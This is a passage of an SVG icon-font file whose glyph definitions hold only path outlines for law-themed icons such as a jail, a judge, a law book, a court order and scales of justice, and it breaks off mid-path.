<glyph glyph-name="jail" horiz-adv-x="1000" unicode="&#xebbd;" d="M968-83h-24v877h24c18 0 32 10 32 28s-14 28-32 28h-936c-17 0-32-10-32-28s15-28 32-28h13v-877h-13c-17 0-32-16-32-34 0-18 15-33 32-33h936c18 0 32 15 32 33 0 18-14 34-32 34z m-179 877h89v-293h-89v293z m-567-877h-100v877h100v-877z m156 0h-78v877h78v-877z m166 0h-88v877h88v-877z m167 0h-78v877h78v-877z m167 0h-89v282h89v-282z m0 358h-89v1l30 70c-15 6-26 21-26 38 0 23 18 41 41 41 22 0 41-18 41-41 0-16-10-30-24-37l0 0 27-62 4-10h-4z" />
<glyph glyph-name="judge" horiz-adv-x="1000" unicode="&#xebbe;" d="M552 846c50-10 97-34 137-67 34-28 58-63 83-102 13 19 25 36 44 46 33 16 75 10 101-16 28-26 35-68 16-103-8-14-14-22 1-38 45-46 35-107-21-139-13-8-22-12-20-31 6-50-11-80-47-96-37-17-74-8-108 28-3 3-5 8-8 12-105-101-221-132-355-78-33 13-61 33-86 57-13 13-20 14-33-1-32-35-68-40-105-22-36 18-54 52-47 97 2 14 1 19-12 26-64 35-72 88-24 147 6 7 9 11 5 22-26 61-18 100 22 126 43 27 82 17 130-35 46 92 121 153 218 167 36 5 73 6 109 0z m-56-593c64 1 109 14 153 44 134 91 131 275-8 358-93 55-190 56-284 3-139-79-149-260-21-355 47-34 100-53 160-50z m377 210c26 0 42 13 43 39 2 28-14 45-41 45-26 1-44-15-43-43 0-26 15-40 41-41z m-18 141c29 0 44 16 44 43 0 24-17 42-42 41-26 0-43-16-42-44 0-26 15-39 40-40z m-664-273c25 3 41 18 41 42 1 28-17 44-44 44-25 0-41-16-41-42 1-28 16-42 44-44z m-91 313c1-29 15-46 42-47 25 0 42 16 43 41 1 27-15 43-42 44-27 1-41-13-43-38z m-18-147c4-26 18-42 46-40 26 2 40 19 38 44-1 26-17 43-45 41-26-2-38-19-39-45z m686-117c1-28 14-43 41-43 28-1 44 17 43 44-1 26-18 40-44 39-26 0-40-15-40-40z m83-372c-3 83-62 152-143 172-24 6-37 2-50-21-32-60-67-118-101-178-2 0-5 1-8 1 0 52 1 103 0 154-1 38-17 57-49 56h-1c-31 1-48-18-48-56-1-51-1-102-1-154-2 0-5-1-8-1-34 60-69 118-101 178-12 23-26 27-50 21-81-20-140-89-143-172-1-43 1-86-1-128 0-21 4-30 28-30 108 0 216 1 324 1s217-1 325-1c24 0 28 9 28 30-1 42 1 85-1 128z m-409 504c0-20-16-36-35-36s-36 16-36 36c0 20 16 36 36 36s35-16 35-36z m190 0c0-20-16-36-36-36s-35 16-35 36c0 20 16 36 35 36s36-16 36-36z m12-66c-3-1-4 1-4 4-5 29-27 50-56 53-28 3-53-14-64-41 0-1-1-3-1-4-6 5-12 7-17 7-6 0-12-2-17-7-1 1-2 3-2 4-10 27-36 44-64 41-29-3-51-24-55-53-1-3-1-5-5-4-3 0-3-2-3-4 0-2 0-4 3-4 4 0 4-2 5-5 2-17 10-31 24-41 9-6 18-10 28-12 6-1 12-1 18 0 13 2 24 8 33 18 13 12 19 27 19 44 1 8 7 15 15 15h1c8 0 14-6 15-15 0-17 6-32 18-44 10-10 21-16 34-18 6-1 12-1 18 0 10 2 19 6 28 12 13 10 22 24 24 41 1 3 1 5 5 5 3 0 3 2 3 4 0 2 0 4-3 4z m-220-58c-30 0-53 24-53 54 0 30 24 54 55 54 29-1 53-25 53-55-1-30-25-53-55-53z m155 0c-30 0-54 24-54 53-1 30 23 54 53 55 30 0 55-24 55-54 0-30-24-54-54-54z m-1-13c-3 0-7 0-10 1-13 2-25 8-36 18-12 13-19 29-20 48 0 6-4 10-10 10-6 0-11-4-11-10-1-19-7-35-20-48-10-10-23-16-36-18-6-1-13-1-20 0-10 1-20 6-29 12-15 12-24 26-27 45l0 0h0c-3 0-7 1-8 9 0 1 0 4 3 6 1 1 2 2 5 2h0v1c5 31 29 54 60 57 29 3 56-15 68-43 10 6 20 6 30 0 11 29 38 46 68 43 31-3 55-26 60-57v-1h0c2 0 4-1 5-2 2-2 2-5 2-6 0-8-4-9-7-9l0 1c0 0 0-1-1-1-2-19-11-34-26-45-9-7-19-11-30-12-3-1-6-1-10-1z m0 121l0-5c-13 0-25-5-34-15-10-9-15-22-15-35 1-26 23-48 50-48 27 0 49 22 49 49 0 27-22 49-50 49l0 5z m-153 0v-5c-28 0-50-22-50-49 0-27 22-49 49-49 28 0 50 21 50 48 0 13-5 26-14 35-9 10-21 15-35 15l0 5z" />
<glyph glyph-name="law-alt-1" horiz-adv-x="1000" unicode="&#xebbf;" d="M639-51c-20 11-41 22-62 32-9 4-12 9-11 18 0 90 0 180 0 270h0c0 91 0 182 0 274 0 10-2 13-12 11-32-5-62-12-93-18-7-2-10-4-10-12 1-18 0-35 0-53 0-158 0-315 0-473 0-8-2-12-9-15-22-11-45-23-67-36-22-12-37-31-36-58 0-17 4-22 21-22 52 0 104 0 155 0 47 0 94 0 140 0 19 0 23 5 23 24 0 28-15 46-39 58z m212 666c21 1 41 8 59 21 18 15 30 33 31 57 1 21-11 31-31 26-8-2-16-5-24-8-17-5-33-12-51-11-28 1-57 3-85 4-75 3-150 0-224-12 25 12 42 37 42 67 0 40-33 74-74 74s-74-34-74-74c0-38 27-68 63-73-1-1-3-1-5-1-99-21-192-57-282-101-20-10-40-14-62-15-12 0-23 1-35-2-15-5-21-16-16-32 6-15 16-26 29-34 34-21 69-16 104-3 40 16 80 31 121 44 141 45 285 69 432 73 28 0 55-1 82 0z m-343 0c-13 1-26 13-26 26 0 13 12 25 26 25 13 0 25-12 25-25 0-14-12-26-25-26z m469-407c-7 1-10 3-12 10-13 42-26 85-39 128-22 71-45 142-67 213-5 15-15 24-28 24-12-1-23-10-28-25-3-11-7-22-10-33-32-102-64-205-95-307-2-6-4-9-12-10-17 0-24-8-23-25 2-39 20-69 53-89 36-21 75-27 115-26 35-1 69 4 102 19 40 19 64 50 67 95 1 18-6 26-23 26z m-271-39c28 0 56 0 84 0 4 0 6-1 7-6 4-21 13-40 32-55-65-3-117 23-123 61z m191 40c-44 0-89 0-133 0-5 0-11-1-8 8 24 79 49 159 75 243 12-36 22-69 32-102 14-46 28-92 43-137 3-10 1-12-9-12z m-581-129c-9 1-12 4-14 12-24 77-48 154-72 231-11 36-22 73-34 110-6 19-23 27-39 19-10-5-14-13-18-23-34-113-69-225-104-338-2-7-5-10-14-11-15 0-21-7-21-22 1-42 20-73 56-93 35-20 73-25 112-25 29 0 58 3 86 13 49 16 80 53 83 102 1 16-5 25-21 25z m-249-75c-10 7-18 17-23 28-2 6-1 8 5 8 26 0 51 0 77 0 4 0 8 0 8-6 3-21 13-39 30-55-35 1-68 4-97 25z m167 76c-45 0-90 0-134 0-7 0-10 0-7 8 24 78 48 156 73 235 0 1 1 2 3 6 14-45 27-88 41-131 11-35 21-71 33-106 4-11 0-12-9-12z" />
<glyph glyph-name="law-alt-2" horiz-adv-x="1000" unicode="&#xebc0;" d="M976 240c-5 0-10 1-13 7-41 81-83 162-125 243-1 2-2 4-3 6 18 3 35 9 51 16 22 10 31 32 22 53-9 22-32 32-54 22-38-17-74-17-110 4-3 1-5 2-8 4-55 27-113 40-174 43-11 1-23 2-34 2 30 11 51 40 51 74 0 44-35 80-79 80s-79-36-79-80c0-34 21-62 51-74-9 0-18-1-27-1-69-4-135-19-196-52-34-17-67-16-100-1-23 10-47 2-57-19-9-21 0-44 23-56 15-7 32-12 50-15-2-4-4-8-6-11-40-78-80-156-120-233-4-9-9-14-18-12-10 2-16-2-21-10v-6c16-57 58-86 111-103 70-23 140-20 207 11 26 12 47 29 64 52 8 11 14 24 17 38 2 11-4 19-14 18-15-2-21 5-27 17-39 76-78 151-117 226-6 12-6 12 8 14 29 4 57 13 85 24 28 10 56 22 86 25 13 1 13 2 13-12 0-161 0-322 1-482 0-8-1-11-10-12-30-4-54-29-57-59-1-7-4-8-9-8-19 1-38 1-57 1-39 0-67-27-68-67h534c-1 37-30 65-68 66-19 1-38 1-57 0-6 0-8 1-9 8-3 31-28 56-58 59-6 1-8 2-8 8 0 164 0 327 0 491-1 8 3 8 9 7 26-2 51-10 75-19 35-14 70-27 107-31 10-1 4-6 3-10-28-54-57-108-85-163-13-25-26-50-39-76-3-5-6-8-12-7-3 1-6 0-9 0-11 0-17-7-14-18 5-29 23-51 46-69 32-24 69-37 108-43 56-8 111-2 162 22 28 14 52 32 69 59 6 10 9 22 13 33v6c-5 10-14 11-24 10z m-677 1h-198c33 62 65 123 99 186 34-62 66-124 99-186z m402 0c33 62 65 123 99 186 34-63 66-124 100-186h-199z" />
<glyph glyph-name="law-alt-3" horiz-adv-x="1000" unicode="&#xebc1;" d="M250 636c71-14 142-30 214-38 10-1 17-2 17-16-1-37 0-74 0-111 0-81 0-162 0-243 0-4-2-12 4-13 11-1 23-2 33 1 8 3 4 15 4 22 0 113 0 225 0 337 0 12-2 21 15 23 70 7 139 22 208 36 19 3 26 10 23 32-3 24-18 14-27 15-80 0-159 0-239 0-82 0-165 0-247 0-10 0-21 3-20-15 1-12-7-26 15-30z m740-334c-3 4-4 9-6 14-32 83-64 166-97 249-3 8-4 18-18 25 40-103 78-201 117-303-40 0-76 1-113 0-18-1-24 4-23 24 1 82 0 164 0 246 0 8 2 17-4 26-7-8-5-17-5-24 0-84 0-168 1-251 0-16-4-22-20-21-31 1-63 1-95 0-18-1-22 3-14 22 34 84 66 169 99 254 3 7 9 14 6 25-10-6-10-15-13-22-34-86-68-172-101-258-3-6-4-15-8-17-12-7-6-14-1-21 17-25 40-43 70-47 53-6 105-5 157-1 21 2 39 12 55 26 16 14 36 29 13 54z m-678-15c-10 5-11 15-14 24-34 85-67 170-100 256-3 7-2 17-14 19-1-9 4-16 7-23 32-83 65-167 97-250 11-26 10-26-15-26-30 0-60 1-90 0-17-1-23 4-23 23 1 82 1 164 1 246v24c-3 0-5 0-8 0 0-12 0-24 0-35 0-79 0-158 0-236 0-10 4-22-13-22-40 1-80 0-123 0 20 53 39 102 58 152 18 49 41 96 58 152-12-9-13-17-16-24-34-86-67-172-101-258-2-6-4-15-8-18-14-7-7-14-1-22 22-31 53-48 89-49 41-1 82-1 123 0 38 1 68 19 90 52 3 4 11 10 3 15z m330-295c-10 0-19 0-28 0-46 0-46 0-47 50 0 7 0 14-1 20-6 37-33 61-68 59-34-1-59-28-61-66-1-15-1-30 0-45 0-13-4-19-18-18-18 1-37 0-55 0-10 1-18 0-18-15 0-14 7-15 18-15 45 0 91 0 136 0 47 0 94 0 141 0 11-1 15 3 15 15 0 11-3 16-14 15z m-486 605c36 0 67 30 68 68 2 39-29 73-66 74-36 0-66-32-67-70-1-38 28-71 65-72z m689 0c37 0 66 31 66 70 1 40-29 72-66 71-36 0-65-31-65-68-1-41 28-73 65-73z m-373-404c-26-20-22-48-19-79 33 25 65 23 99-1 2 35 4 66-26 84-18 11-37 10-54-4z" />
<glyph glyph-name="law-book" horiz-adv-x="1000" unicode="&#xebc2;" d="M276 266h90c-15 28-30 56-45 83-15-28-30-55-45-83z m270 0h90c-15 28-30 55-45 83-15-28-30-55-45-83z m196 514h-572c-71 0-129-58-129-128v-674c0-71 58-128 129-128h572c72 0 129 57 129 128v674c0 70-58 128-129 128z m-61-522c-2-5-3-10-6-14-8-13-18-21-31-27-23-11-48-14-73-10-18 2-34 8-49 19-10 8-18 18-21 31 0 5 2 8 7 8 2 0 3 1 4 0 3 0 4 1 6 4 5 11 11 22 17 34l38 73c1 2 4 4-1 5-17 1-32 7-48 13-11 4-22 8-34 9-3 0-4 0-4-3v-221c0-3 1-3 3-4 14-1 25-12 26-26 1-3 2-4 5-4 8 1 17 1 25 0 17 0 30-13 31-29h-240c0 17 13 30 31 30 8 0 16 0 25-1 3 0 4 1 4 4 2 14 12 25 26 26 4 1 4 2 4 5v217c0 6 0 6-6 6-14-2-26-6-39-12-12-4-25-8-38-10-6-1-6-1-3-7 17-33 35-67 52-101 3-5 5-8 12-8 5 1 7-3 7-8-2-6-4-12-8-17-7-10-17-18-28-23-31-14-62-15-94-5-23 8-42 21-50 46v3c2 4 5 6 9 5 5-1 7 1 9 5 18 35 36 70 54 104l3 5c-8 2-16 4-23 8-10 4-15 15-10 25 4 9 15 13 25 8 15-7 30-7 45 1 28 14 57 22 88 23 5 0 8 0 13 1-14 5-23 18-23 33 0 19 15 35 35 35 20 0 36-16 36-35 0-15-10-29-23-33 5-1 10-1 15-1 27-2 54-8 78-20 1-1 3-1 3-2 17-9 33-9 50-1 10 4 21 0 25-10 3-10 0-20-10-24-8-3-15-6-23-8l1-2 56-109c2-3 3-3 6-3 5 0 9 0 11-5l0-3z m150 592h-573c-45 0-85-24-108-59 17 8 35 12 54 12h572c72 0 129-58 129-128v-673c0-26-8-50-21-70 45 19 75 64 75 116v673c0 71-57 129-128 129z" />
<glyph glyph-name="law-document" horiz-adv-x="1000" unicode="&#xebc3;" d="M639 225c2-35 0-71 1-106 0-13-4-22-14-31-42-39-102-42-146-3-15 14-26 13-43 7-130-46-260-91-390-137-17-6-21-3-21 15 0 257 0 515 0 772 0 18 6 22 23 22 189-1 378-1 568 0 19 0 23-7 23-25-1-103-1-206-1-310v-29c22 10 27 23 26 41 0 108-1 216 0 323 1 21-6 26-26 26-204-1-409-1-613 0-21 0-26-6-26-26 1-277 1-555 0-832 0-20 5-24 25-20 159 33 318 65 476 104 45 12 91 20 130 46 15 9 32 20 33 38 2 54 0 108 0 163-19-8-26-19-25-38z m-478-263c0 1-1 3-2 4 59 21 119 43 178 65 33 12 67 24 100 37 15 6 26 7 39-6 8-8 19-12 33-20-118-27-233-53-348-80z m834 634c-7 14-11 28-26 34-14 6-26-1-37-11-62-54-125-108-187-163-23-20-49-38-69-63 23-9 35-27 44-49 35 30 69 59 103 89 4 3 10 12 13 6 8-22 15-4 20 0 39 32 76 65 114 99 17 15 41 26 25 58z m-443 51c-146 0-293 0-439 0-11 0-24 4-23-16 0-18 12-14 22-14 74 0 147 0 221 0 73 0 145 0 218 0 11 0 24-5 24 15 1 19-12 15-23 15z m3-120c-148 0-296 0-444 0-11 0-21 1-21-16 0-18 12-15 22-15 73 0 147 0 220 0 74 0 148 0 221 0 10 0 22-3 22 15 1 16-9 16-20 16z m20-138c1 19-12 16-23 16-146 0-293 0-439 0-11 0-24 3-23-16 1-20 14-15 25-15 72 0 143 0 215 0 74 0 147 0 221 0 10 0 24-5 24 15z m100 4c-44-32-83-71-125-107-39-32-38-32-3-70 9-10 14-12 25-3 49 44 98 87 148 131-21 4-41 27-45 49z m45-49c0-1 0-1 1-1l-1 1 0 0 0 0z m-45 50l1-1 0 0-1 1c0-1 0-1 0-1l1 0-1 1z m-220-253c-17 3-24-13-37-16-5-6-9-12-14-17 38 16 87 10 106 59 2 3 6 7 9 8 19 10 18 20 3 33-4 3-8 8-11 13-8 11-15 16-26 2-8-11-21-19-36-20-6 0-10-3-13-9-13-25-26-51-41-80 10 6 16 9 22 12 5 12 22 16 19 34-2 7 7 12 15 11 9 0 14-5 15-14 1-8-4-17-11-16z m-321 11c39 13 78 26 117 38 36 12 36 12 25 47-52-16-104-33-155-48-13-4-20-10-15-25 5-17 15-17 28-12z m142 85l0 0 0 0 0 0z m-188 0c-5-1-10-3-17-5 9-10 15-19 23-26 5-5 1-17 12-16 12 2 10 13 12 20 12 42 45 65 88 59 18-2 32-10 45-23 3-4 7-8 12-5 4 2 9 3 7 9-6 14 3 29-4 46-34-25-58-14-70 26-5-5-6-7-8-9-20-32-20-33-56-21-19 6-14-7-13-14 6-26-5-39-31-41z m210-90c6 1 11 3 19 6-8 9-14 18-22 25-6 4-2 17-13 16-12-2-11-13-13-22-11-38-42-59-82-57-20 1-36 10-50 24-3 3-7 7-13 3-3-2-7-3-5-9 5-13-4-28 4-45 35 29 56 10 70-26 5 8 8 11 10 15 10 24 25 33 50 18 17-11 17 1 15 13-4 24 4 38 30 39z m-22 90l0 0 0 0 0 0z m16-32c9 9 18 16 23 28-14 3-26 9-39 4 14-5 10-20 16-32z m259-7c-14 18-28 35-45 50l-5-5 45-50 5 5z" />
<glyph glyph-name="law-order" horiz-adv-x="1000" unicode="&#xebc4;" d="M520-56c-9 0-12 4-12 12 0 10 0 20-1 30-2 25-18 43-41 43-127 0-254 0-381 0-21 0-37-14-41-35-2-10-1-21-1-31 0-19 4-19-18-18-4 1-9 0-13 1-9 1-13-2-12-12 1-10 0-21 0-31h550c0 3 0 7 0 10 0 30 0 31-30 31z m437 262c-148 77-296 156-445 233-8 4-8 8-4 15 15 24 28 49 42 73 4 6 5 9-3 14-79 45-158 91-237 137-8 4-11 4-16-4-45-79-91-159-137-238-4-7-3-9 4-14 79-45 158-91 237-137 8-4 11-3 15 4 13 23 26 45 39 67 9 15 9 15 23 6 141-89 281-178 422-267 12-8 25-14 39-13 35 0 62 25 64 58 2 32-15 52-43 66z m-635 513c84-49 169-98 253-147 10-5 20-8 32-5 17 5 28 17 32 34 3 18-5 35-23 45-38 23-77 45-115 67-45 26-90 52-136 78-31 17-65-2-65-36 0-16 8-28 22-36z m-232-401c27-16 54-31 81-47 58-33 115-67 172-99 30-17 65 2 65 40-1 13-9 25-23 33-84 49-168 97-252 146-10 5-20 8-31 5-17-4-29-15-33-33-4-18 4-35 21-45z" />
<glyph glyph-name="law-protect" horiz-adv-x="1000" unicode="&#xebc5;" d="M999 181c-19 48-37 96-63 140-2 4-3 7-8 6-18-3-36-4-54-10-6-2-12-5-14-12-4-18-16-32-26-46-9-12-20-17-35-20-46-9-92-6-138-8-5 0-7 2-10 5-18 21-36 42-54 63-10 11-9 15 5 18 33 6 67 10 100 18 3 1 6 1 9-2 11-11 7-30-6-37-3-1-7-2-10-3-3-2-7-2-7-5-1-4 4-5 7-6 20-10 41-14 64-16 5 0 9 1 14 5 20 19 40 37 57 57 9 11 19 17 32 22 26 10 53 16 79 24 21 5 34 18 42 37 7 18 8 37 4 56-7 28-18 36-46 32-5 0-10-1-15-3-15-4-31-10-47-13-22-6-35 3-41 24-1 6-2 11-4 17-6 15-15 22-31 21-13-1-27-3-40-6-38-8-78-14-117-7-21 3-39-1-57-11-12-6-25-11-38-15-23-8-47-13-69-24-10-4-14-11-13-22 1-16 1-33 12-46-3-3-6-3-9-3-39-3-77-6-116-9-92-7-183-14-275-22-19-1-39-2-57-8-10-3-17-9-19-19-12-43-2-81 22-117 4-6 10-8 17-8 38 1 77 6 115 12 122 19 243 41 364 63 30 6 39 2 56-24 8-14 17-28 26-41 8-12 15-25 27-34 17-15 38-13 59-11 33 3 65 6 97 10 14 1 26-3 34-16 4-8 10-15 15-23 4-7 9-9 16-9 26 0 51 3 75 6 21 2 41 5 61 8 7 1 14 2 10 12z m-77 257c0 11 1 22 7 32 10 15 25 14 33-1 12-22 10-45-6-61-12-11-23-9-30 6-4 8-4 16-4 24z m-173-27c6 21 12 41 15 63 1 7 2 14 3 21 3 14 10 18 29 16 14-1 13-10 13-20 0-2 0-5 0-7l0-1c-2-23-5-47-8-71-1-11-6-17-19-18-6 0-12-2-19-2-13 0-17 5-14 19z m-87-23c1 8 3 15 5 23 7 23 14 45 20 67 3 12 10 20 21 24 13 6 17 3 18-11 0-1 0-3 0-4-1-22-8-43-12-64 0-2-1-4-1-6-5-28-14-36-41-40-9-1-10 5-10 11z m-52 90c0 2 1 4 2 6 4 8 5 17 17 14 16-4 21-10 19-23-7-36-15-72-23-108-1-4-2-8-4-11-3-5-8-8-14-7-5 1-8 4-9 10-2 6-2 12-2 19 2 33 6 67 14 100z m-342-192c-61-3-119-22-178-32-31-5-52 10-56 41-2 14 2 18 16 14 28-7 56-12 85-15 44-6 89-6 133 2 10 1 20 2 32-2-11-7-22-7-32-8z m303 59c-6 0-13 3-19 8-19 16-31 37-36 61-6 30-6 31 22 45 3 1 6 2 9 4 17 7 20 5 22-14 1-23 3-47 5-70 0-8 2-15 5-22 5-8 3-12-8-12z" />
<glyph glyph-name="law-scales" horiz-adv-x="1000" unicode="&#xebc6;" d="M37 335c1 8 2 16 5 23 1 1 1 2 2 4 6-6 11-12 15-19 10-14 19-29 21-47 2-12 1-23-5-35-5 15-11 29-16 43l-1 0c3-12 6-24 10-36 1-4 0-8-2-13-6 9-12 18-17 27-6 12-11 23-12 36 0 1 0 1-1 1l1 16z m801 347c19-4 37-8 55-12 9-2 18-3 27-5 2-1 5-6 4-8-1-2-3-1-4-1-5 0-5 0-4-5 12-41 23-82 35-123 1-5 3-6 7-5 6 0 6-1 4-6-3-9-9-15-16-20-15-10-31-13-49-12-14 0-28 4-40 12-7 5-13 12-15 21-1 4-1 5 4 5 4-1 5 1 6 4 14 42 28 83 41 124 2 5 2 5-3 5h-118c-5 0-5 0-3-5 12-42 24-84 36-126 1-4 2-6 6-5 3 1 3-1 3-4-3-10-10-17-19-23-14-9-31-12-48-11-13 1-26 4-38 12-7 5-13 11-16 20-1 6-1 6 4 6 5 0 6 1 8 5 10 33 21 66 32 99 0 1 0 2 0 2-2 1-2 0-3-1-14-13-30-24-47-32-7-4-12-4-19-2-28 6-56 15-84 23-3 1-7 2-10 3 5-13 0-25-3-37-5-17-5-34-3-52 0-5-2-9-3-14-1-6-1-12-3-18-2-5-4-9-10-10-2 0-2-1-2-3 2-5 3-10 7-15 10-15 15-32 18-50 7-35 7-70 6-106-2-38-7-77-12-115-6-39-12-79-18-118-2-12-4-24-5-36-1-5 2-10 3-16 2-15 6-30 5-45 0-4 0-7-1-11-1-1-1-2 0-3 1-1 2-2 3-3 2-5 2-8-2-12-3-3-7-5-12-5-11 0-22 2-32 6-1 0-3 1-4 1-20 2-40 1-58-10-7-4-16-7-25-8-5 0-8 1-10 7-1 1-2 1-3 2-2 1-4 2-5 4-5 3-6 6-2 11 4 6 4 12 5 19 0 9 1 17 1 26 0 3 0 6-2 8l-143 265c-8 16-17 31-25 46-1 3-2 3-5 2-12-6-24-12-37-17-1-1-3-3-5-1-1 2-2 3 0 5 12 12 23 24 34 35 3 3 3 5 1 7-1 1-1 2-1 3-1 3-3 4-6 1-1-1-2-1-4-1-9 1-19 9-22 18 0 2 0 3 0 4 4 6 2 12 1 17 0 3 0 5 2 6 3 2 3 5 1 8-3 5-5 10-8 15-1 4-4 6-8 7-8 1-7 0-6 8 4 18 16 22 32 18 2-1 2-2 2-3-2-12 5-21 10-31 1-1 2-1 3 0l18 9c3 2 4 5 6 8 1 1 2 3 3 5 14 36 39 66 60 98 5 7 7 16 11 24 16 34 34 68 54 100 8 12 20 17 33 18 13 1 23 5 31 15 5 5 6 11 8 18 0 1 0 2-2 2-4 1-9 2-13 3-3 2-5 3-7 6 0 0-1 1-1 1-11 3-11 13-12 22-1 6 1 12 1 19 1 10 2 20-1 30-1 2 0 4 1 6 4 6 7 12 11 17 8 7 16 16 26 21 7 3 13 1 20-2 2-1 3-1 6 0 15 7 28 4 40-8 4-5 9-11 13-16 6-8 8-17 5-27-1 0-1-1-1-1-4-7-4-14 2-20 2-1 2-3 1-5-1-9-1-19-6-28 0 0 0 0 0 0-1-5-2-9-6-11-6-3-11-4-17-4-7 0-8-1-6-8 1-4 4-7 7-10 8-10 19-13 31-15 13-3 26-7 39-10 5-1 9-3 13-7 5-4 11-8 16-12 7-7 17-8 25-12 13-5 27-10 40-15 2-1 4-1 7 0 23 13 46 26 68 41 3 3 6 6 9 10 4 5 8 10 13 15 6 6 13 11 22 12 3 1 7 2 10 3 3 2 5 1 7-1 2-1 4-2 5-3 8-8 17-15 26-21 1-1 2-2 3-3 4-4 4-6-4-8z m-539-297c3-6 1-10-3-14-9-7-17-15-25-23-2-1-2-2-1-5 11-20 21-41 32-61 17-35 35-69 53-104l50-97c0-1 0-2 2-2-1 7-3 14-4 21-6 33-12 67-17 101-4 33-7 66-9 98-2 34-2 67 1 100 1 7 1 14 5 21 10 20 20 39 30 59 1 3 2 4-2 5-12 2-15 8-13 19 1 7 3 13 1 20-3 11-6 22-8 33-2 7-4 14-6 21-2-2-4-4-5-6-17-21-31-43-46-66-1 0-2-1-2-3-2-12-9-23-17-33-12-16-26-30-39-44-8-10-15-20-16-33-1-5-3-11-4-16-1-3-2-5-4-5-1 0-3 0-2-1 0-2 1-4 3-5 1-2 2 0 3 0 6 3 12 5 18 8 9 4 17 8 25 12z m455 135h38c6 0 6 0 4 5-9 32-18 64-27 96-3 9-5 17-7 26-1 0-1 3-3 1-3-3-8-6-10-11-12-38-25-76-38-113-1-3 0-4 3-4 13 0 26 0 40 0z m148 3c13 0 25 0 38 0 4 0 4 1 3 4l-36 126c0 1 0 3-2 3-3 0-3-2-3-3-14-42-28-84-41-127-2-3-1-3 2-3 13 0 26 0 39 0z m-457-518l45 5c3 0 3 2 4 4 12 29 21 60 28 91 7 31 12 62 15 93 3 22 5 44 7 66 1 20 2 40 4 60 2 30 1 59 0 88-1-2-1-4-1-6-1-24-2-49-3-73-1-27-3-54-5-81-3-28-6-56-11-84-5-30-12-59-23-87-13-31-29-59-60-76z m35 798c0 0 0 0-1 0-1 0-2 0-4 0-19 1-37-2-55-9-2-1-4-1-4-3-1-4-1-8-2-12 0-2 1-3 3-2 9 2 18 3 27 4 26 1 51 1 76-2 1 0 2-1 3 0 0 3 1 5 1 8 0 2-2 2-4 2-12 5-25 7-38 9 13 0 26-1 38-6 5-2 5-2 6 4 2 4 0 4-3 5-5 2-10 3-15 5-30 10-60 8-89-5-2 0-4-1-3-3 1-2 3 0 4 0 18 6 36 8 55 7 2-1 3 0 5-2z m-63-276v-2c0-8 3-16 3-24 0-1 1-1 2-1 11-2 21-6 31-8 5-1 10-2 15 0 28 14 50 35 66 62 13 24 22 50 29 77 1 7 3 15 5 22-1-1-2-3-2-4-10-32-21-63-41-91-17-24-38-44-67-54-3-2-6-1-9 0-12 6-22 13-32 23z m-6-507c0 9-4 17-8 24-36 76-72 151-108 226-10 22-21 44-31 66-1 1-1 2-2 2-3 1-6-4-5-7 17-34 33-67 50-101 29-59 59-118 88-177 5-11 11-22 16-33z m142 646l-6-4c-29-18-60-27-95-22-22 3-42 12-57 28-2 2-3 6-5 6-2 1-5-2-7-4-6-3-6-3-1-9 18-22 43-31 71-31 27-1 52 5 75 18 9 5 18 10 25 18z m-76-586c-3 1-5 1-8 0-8-1-16-3-24-5-3 0-5 0-7 3-4 8-8 16-11 25-10 25-15 52-20 79l-7 34c-1-2-1-3-1-4 3-24 6-48 11-72 6-30 15-59 28-87 1-2 2-3 4-2 14 7 26 17 35 29z m-72 370c7-12 13-25 21-36 6-9 14-17 23-24 3-1 4-1 6 1 8 7 16 13 24 20 9 7 16 17 23 26-1-1-2-1-3-2-9-8-18-15-26-23-4-4-6-4-10-1-17 12-35 22-52 35l-6 4z m138-463c0 2-1 4-2 6-2 4-4 8-6 12-5 6-5 13-4 21 5 27 12 54 16 81 1 8 2 15 2 22-2-7-4-14-5-21-7-35-17-69-33-101-1-4 0-5 3-5 11-2 21-5 28-15 0 0 1 0 1 0z m8 571c-5-33-28-49-55-61 6-1 12-1 18-2 5 0 8 2 12 5 14 13 21 29 24 47 0 3 2 7 1 11z m236 115l11 3c-4 0-8 1-11-3z m-181-725c-7-8-15-16-22-25-4-4-9-8-15-6 2 8 6 16 10 24 7 15 16 29 30 39 10 7 22 10 34 12 2 0 4 1 3-3-4-19-10-38-22-54-9-12-21-21-36-25 6-1 12-3 18-5 15-5 29-13 41-22 3-2 2-3 0-4-16-13-35-20-56-18-15 1-28 6-42 12-5 2-10 5-15 7-1-1 0-2 0-4v-11c0-8-6-12-13-8-3 1-3 5-3 8v39c0 5 0 9 0 13 0 8 6 11 13 8 3-1 3-5 3-8 0-10 0-20 0-30v-6c6 9 15 6 22 6 9-1 19-2 28-2 1 0 3 0 4 0-17 3-34 7-51 10 10 9 21 14 34 15 7 0 11 2 14 8 7 10 15 20 22 30l-1 0z m-232-63c11 0 21 1 31 2 5 0 10 0 15 1 2 0 3-2 6-3v17c0 4 0 8 0 12 0 9 3 11 12 10 3-1 4-4 4-6 1-4 0-7 0-11v-44c0-6-1-8-6-8-8 0-10 1-10 8 0 5 0 10 0 16-4-2-8-3-11-5-13-5-25-10-39-12-19-3-36 1-53 12-2 1-5 4-8 6-2 1-2 2 0 3 17 13 35 23 57 26 1 1 2 0 3 2-26 6-39 26-49 48-5 9-7 19-10 29-1 4 1 5 4 4 20-3 37-11 49-27 11-15 18-31 25-48-6-1-10 0-14 5-8 10-16 18-24 27-1-1 0-2 1-3 8-11 16-22 23-33 2-2 3-2 6-3 12 0 24-3 34-11 2-1 3-2 5-4-17-3-34-6-51-10v0z m493 320c11 24 29 41 50 55 1 1 2 2 4 2 1-1 0-3 1-5 4-35-11-62-35-86-5-5-10-11-16-16-2 6-1 11 2 17 6 11 12 23 18 34l-13-18c-5-7-9-14-14-20-3-3-6-8-9-12-3 15-5 29-8 43l-1 0c1-7 1-15 2-22 0-5 0-10 1-15 1-5-2-8-4-11-1-1-2-1-2 0-11 24-21 49-13 76 3 9 7 17 12 25 2 3 3 2 4 0 10-14 17-28 20-44 0-1 0-1 1-3z m-749-56c-3 4-4 8-4 14 1 12 1 24 2 36l-8-43c-1 0-2 1-2 1-11 14-20 29-30 44-1 1-2 2-4 3l4-7c5-10 10-20 16-30 2-4 0-7 0-12-2 1-4 3-5 5-12 11-23 22-32 35-13 20-17 42-14 65 0 3 2 2 3 1 21-14 39-31 50-54 1 0 1-1 2-2 3 19 11 34 22 49 22-21 22-69 0-105z m749 197c3-8 6-16 9-24 2-6 2-7-1-13-27 27-35 52-24 87 8-5 15-12 22-21-8 30-1 57 9 84 10-11 17-23 21-37 4-16 3-33 1-50-2-8-3-15-5-24-3 4-7 7-7 12-1 13-2 26-4 39v-47c-2 0-2 2-4 2 4-12 4-25-1-38l-15 